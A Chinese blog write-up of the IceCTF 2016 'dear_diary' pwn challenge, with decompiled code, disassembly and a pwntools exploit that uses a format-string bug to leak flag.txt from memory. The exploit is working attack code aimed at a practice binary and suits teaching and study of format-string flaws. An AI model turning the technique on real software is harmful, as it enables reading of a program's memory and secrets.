2016 icectf dear_diary wp

最新推荐文章于 2022-03-27 14:28:56 发布
最新推荐文章于 2022-03-27 14:28:56 发布
阅读量443 收藏
点赞数
分类专栏: PWN类型之格式化字符串 文章标签: pwn 格式化字符串
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33528164/article/details/71893708
版权

介绍:本篇是格式化字符串漏洞类型的第一篇文章, 以后会陆续更新.
漏洞类型: 格式化字符串.
漏洞危害: 任意地址读写.
思路:查找flag.txt地址, 写入flag.txt的地址. 输入格式化串, 使其打印flag.txt.
下面咱们一步一步来, 文件的下载地址在本篇文章的结尾会给出.
首先是源程序IDA pro F5出来的部分代码:
读取flag:

int __usercall flag@<eax>(int a1@<ebp>)
{
  *(_DWORD *)(a1 - 12) = *MK_FP(__GS__, 20);
  *(_DWORD *)(a1 - 16) = open("./flag.txt", 0);
  read(*(_DWORD *)(a1 - 16), &data, 0x100u);
  return *MK_FP(__GS__, 20) ^ *(_DWORD *)(a1 - 12);
}

打印:

int __usercall print_entry@<eax>(int a1@<ebp>)
{
  *(_DWORD *)(a1 - 28) = *(_DWORD *)(a1 + 8);
  *(_DWORD *)(a1 - 12) = *MK_FP(__GS__, 20);
  printf(*(const char **)(a1 - 28));
  fflush(stdout);
  return *MK_FP(__GS__, 20) ^ *(_DWORD *)(a1 - 12);
}

下面我们来调试程序, 查找读取flag.txt的地址.
flag函数的汇编代码:

0x0804863d <+0>:    push   ebp
   0x0804863e <+1>: mov    ebp,esp
   0x08048640 <+3>: sub    esp,0x28
   0x08048643 <+6>: mov    eax,gs:0x14
   0x08048649 <+12>:    mov    DWORD PTR [ebp-0xc],eax
   0x0804864c <+15>:    xor    eax,eax
   0x0804864e <+17>:    mov    DWORD PTR [esp+0x4],0x0
   0x08048656 <+25>:    mov    DWORD PTR [esp],0x8048940
   0x0804865d <+32>:    call   0x8048500 <open@plt>
   0x08048662 <+37>:    mov    DWORD PTR [ebp-0x10],eax
   0x08048665 <+40>:    mov    DWORD PTR [esp+0x8],0x100
   0x0804866d <+48>:    mov    DWORD PTR [esp+0x4],0x804a0a0
=> 0x08048675 <+56>:    mov    eax,DWORD PTR [ebp-0x10]
   0x08048678 <+59>:    mov    DWORD PTR [esp],eax
   0x0804867b <+62>:    call   0x8048480 <read@plt>
   0x08048680 <+67>:    mov    eax,DWORD PTR [ebp-0xc]
   0x08048683 <+70>:    xor    eax,DWORD PTR gs:0x14
   0x0804868a <+77>:    je     0x8048691 <flag+84>
   0x0804868c <+79>:    call   0x80484c0 <__stack_chk_fail@plt>
   0x08048691 <+84>:    leave  
   0x08048692 <+85>:    ret

很明显的是:

0x08048662 <+37>:    mov    DWORD PTR [ebp-0x10],eax
0x08048665 <+40>:    mov    DWORD PTR [esp+0x8],0x100
0x0804866d <+48>:    mov    DWORD PTR [esp+0x4],0x804a0a0
对应的是read函数的三个参数,其中0x804a0a0是read到内存中的地址.
所以我们要利用add_entry将0x804a0a0输入到程序中去.

下面我举个简单的例子帮助大家理解:

   在add_entry函数中,我输入字符串”i love you”,记下此时字符串的地址为0xffffbaa8.第二次我再次输入字符串”hello world”,记下此时的地址为0xffffbba8, 存放在栈上的地址为0xffffba60.执行printf的时候,将地址传给printf即可. 可见二者差的并不是很远.现在假设:第一次输入的是flag的地址,第二次输入的格式化字符串. 然后在执行printf的时候将flag的地址传给printf, flag的内容打印出来. 这个假设是成立的.
我先放出exp:

from pwn import *
choise1 = "1"
choise2 = "2"
choise3 = "3"

#t=remote('104.154.248.13',6501)
t = process("./dear_diary")

print t.recvuntil(">")

########## choice1 ##################
print choise1
t.sendline(choise1)
print t.recvuntil(":")
payload = 0x0804a0a0
print p32(payload)
t.sendline(p32(payload))  #输入flag的地址
print t.recvuntil(">")

##########choice1 #################
print choise1
t.sendline(choise1)
print t.recvuntil(":")
addr1 = 0xffffba60
addr2 = 0xffffbaa8
p = (addr2-addr1)/4-1
payload = "%08x."*p+"%s" #计算好距离读取指定参数           
print payload
t.sendline(payload)
print t.recvuntil(">")

#########choise2#################
print choise2
t.sendline(choise2)
print t.recvuntil(">")

##########choise3##############
print choise3
t.sendline(choise3)

这个exp涉及到格式化字符串一些常用的姿势:

常见用法 : 
%c 将对应参数以字符的形式进行格式化
%hd 以短整形的形式 (这里加上 h 表示短整形 , 也就是从内存取值的时候只取 2 个字节 (32位))
%d 以整形的形式
%ld 以长整形的形式
%x 以 16 进制的形式
%s 以字符串的形式 (注意这里与上面的有所不同 , 这里字符串的参数实际上是一个地址 , 这里的地址指向了需要被打印的字符串)

文件下载地址:https://github.com/ctfs/write-ups-2016/tree/master/icectf-2016/pwn/dear-diary-60

qq_33528164
关注
专栏目录
i春秋第二届春秋欢乐赛 Substituted writeup
hanjinrui15的博客
10-04 1045
i春秋第二届春秋欢乐赛 Substituted writeup 第一步:审题 题目中给出了一个文本文档: Lw! Gyzvecy ke WvyVKT! W’zz by reso dsbdkwksky tzjq teo kly ujr. Teo keujr, gy joy dksurwmq bjdwv vorakeqojalr jmu wkd jaazwvjkwemd. Vorakeqojalr l...
【Dear imgui】ImGui输入框在Android中的解决方案
Gary的面包屑小道
01-08 5716
Dear ImGui本身是一个十分强大的GUI解决方案,但是目前为止,作者的回复仍然是DearImGui主要还是为PC进行服务,但是由于DearImGui本身使用底层图形API进行绘制,所以其跨平台性是非常强的。 所以随着作者的不断更新,DearImGui在移动端使用也是他们考虑的方向之一。 背景: 在我目前的项目中,移动端使用的UI解决方案就是DearImGui,既然在移动端使用,无法避免的就是输入问题,PC中的键盘消息,DearImGui使用的是GLFW这些库去处理,所以使用InputText、I
[ICECTF 2016] [CRYPTO 140 – SAND CASTLE] WRITE UP
weixin_33951761的博客
11-12 157
题目: We found this very mysterious image, it doesn't look complete and there seems to be something hidden on it... does this mean anything to you?beach.jpgThis flag is not in th...
IceCTF2016-部分WP
xuqi7
08-27 8902
HelloWorld! 直接提交即可 IceCTF{h3l10_wr0ld}     Spotlight 查看源码,在spotlight.js中发现flag IceCTF{5tup1d_d3v5_w1th_th31r_l095}     Allyour Base are belong to us 二进制转ascii即可 IceCTF{al1_my_bases_are_you
南邮CTF逆向题第一道Hello,RE!解题思路
iqiqiya的博客
12-23 5194
首先可以看到提示如下    我还是查了一下 无壳 提示用IDA 那我们就载入 shift+f12查找字符串 双击进入 在右侧窗口接着双击 然后f5看到了伪代码 于是点击字符串全按R即可  我再用OD试一下 段首F2下断 F9运行 段下来后接着单步  走到这个call处  输入假码 回车 接着
IceCTF 2016
困难是否磨灭你的自信
09-21 2827
WriteUp Corrupt Transmission Rotated! Blue Monday All your Base are belong to us Thor’s a hacker now Scavenger Hunt R.I.P Transmission 涨姿势 Audio Problems Intercepted Conversations Pt.1 Intercepted Conv
IMGUI 系统 - Dear ImGUI
热门推荐
Jave.Lin 的学习笔记
07-03 2万+
简单介绍 因为我在写 LearnGL 系列笔记的时候,发现没有 GUI 可以用,好蛋疼,然后在 GitHub 上找到一个叫:Dear ImGui,这个GUI系统对我来说,太太太完美了,它是用 C++ 编写的一个 GUI 系统。 看了下面的 案例截图 你会发现,原来以前看到的一些大厂的各种 DEMO,或是一些软件原来就是用 Dear ImGui 制作的,Vulkan、OpenGL的一些示例,还有如果你使用过 Unity 的旧版的 GUI 系统,你就会发现 Unity 的 GUI 接口设计是参考 Dear Im
Dear ImGui笔记(一)
沉剑池
07-06 7171
参考资料: https://github.com/ocornut/imgui ImGui::Begin() 参数1:name,相当于窗口的id,是独一无二的 参数2:p_open,如果设置这个参数,窗口的右上角就会出现一个X按钮来执行关闭窗口的功能。这个参数和X按钮绑定,当X按钮被按下时,p_open被设为false 参数3:flags,这个参数的类型实际上是int,用来指示当前窗口的某个feature是否应该激活 如何使用window_flags控制窗口的feature 原理探寻: 例如demo中的
picoCTF2022_wp
fly1ng_pengu1n的博客
03-27 5161
picoCTF2022_wp_fgps
dear_demo.zip
11-26
亲爱的读者,欢迎了解这篇关于DearPyGui的实践项目——"dear_demo.zip"。这个压缩包包含了一个Python GUI项目的源代码,旨在帮助开发者快速启动自己的图形用户界面(GUI)开发。DearPyGui是一个强大且易用的库,专门...
SBM_DEA 1_dea代码_matlabdea_matlabSBM_matlab做SBM_超效率SBM模型_源码.zip
10-05
MATLAB DEA工具箱提供了多种DEA模型的实现,包括C2R、CRS、VRS等,以及SBM模型。MATLAB DEA工具箱的使用通常包括以下步骤: 1. **数据准备**:首先,你需要整理好DEA分析所需的数据,数据应包含各个决策单元的输入...
DEA.rar_DEA_dea MATLAB_dea模型_网络DEA 编程
09-24
DEA(Data Envelopment Analysis,数据包络分析)是一种在运筹学和管理科学中广泛使用的非参数效率评估方法。它主要用于评价多输入、多输出的决策单元(DMU)的相对效率,尤其适用于处理具有复杂关系和网络结构的...
dear_benjamin
09-02
dear_benjamin
dear_benjamin008
09-02
dear_benjamin008
KKобтьу╬kkx.net.url
最新发布
09-14
KKобтьу╬kkx.net.url
『人事流程图新』人力资源培训计划制定工作流程图.xlsx
09-14
『人事流程图新』人力资源培训计划制定工作流程图.xlsx
Delphi XE Web开发使用嵌入版Firebird数据库,演示IntraWeb的使用
09-14
Delphi XE Web开发使用嵌入版Firebird数据库,演示IntraWeb的使用。 开发测试环境: Embarcadero Delphi XE Version 15.0.3890.34076 IntraWeb 14.0.32 Firebird 2.5.9 (Windows Build) 注:本delphi源代码参考官方文档,修改测试而成,都是本人实验成功的。(本人CSDN的ID:i8013)
基于Springboot和Mysql的汽车销售网代码,包括程序,中文注释,配置说明操作步骤
09-14
汽车销售网-汽车销售网-汽车销售网-汽车销售网-汽车销售网-汽车销售网-汽车销售网-汽车销售网-汽车销售网-汽车销售网-汽车销售网-汽车销售网 1、资源说明:汽车销售网源码,本资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 2、适用人群:计算机相关专业(如计算计、信息安全、大数据、人工智能、通信、物联网、自动化、电子信息等)在校学生、专业老师或者企业员工等学习者,作为参考资料,进行参考学习使用。 3、资源用途:本资源具有较高的学习借鉴价值,可以作为“参考资料”,注意不是“定制需求”,代码只能作为学习参考,不能完全复制照搬。需要有一定的基础,能够看懂代码,能够自行调试代码,能够自行添加功能修改代码。 4. 最新计算机软件毕业设计选题大全(文章底部有博主联系方式): https://blog.csdn.net/2301_79206800/article/details/135931154 技术栈、环境、工具、软件: ① 系统环境:Windows ② 开发语言:Java ③ 框架:SpringBoot ④ 架构:B/S、MVC ⑤ 开发环境:IDEA、JDK、Maven、M
MATLAB的图像处理系统GUI设计.zip
09-14
linux常用命令大全
E:\anaconda\anaconda\python.exe: can't open file 'E:\\Pycharm\\zhuanli2\\DeAR_source_code\\data.py': [Errno 2] No such file or directory
08-03
根据引用[1]和引用[2]的信息,报错信息"E:\anaconda\anaconda\python.exe: can't open file 'E:\\Pycharm\\zhuanli2\\DeAR_source_code\\data.py': [Errno 2] No such file or directory"表明在配置Python解释器时,指定的文件路径不存在。这可能是由于文件路径错误或文件不存在导致的。 根据引用[3]的信息,可以尝试以下两种方法解决该问题: 1. 确保文件路径正确:检查文件路径是否正确,确保文件存在于指定的路径中。 2. 更改解释器配置:在配置Python解释器时,选择正确的Python解释器路径,确保路径指向正确的Python解释器文件。 请根据具体情况检查文件路径和解释器配置,确保路径正确并存在相应的文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值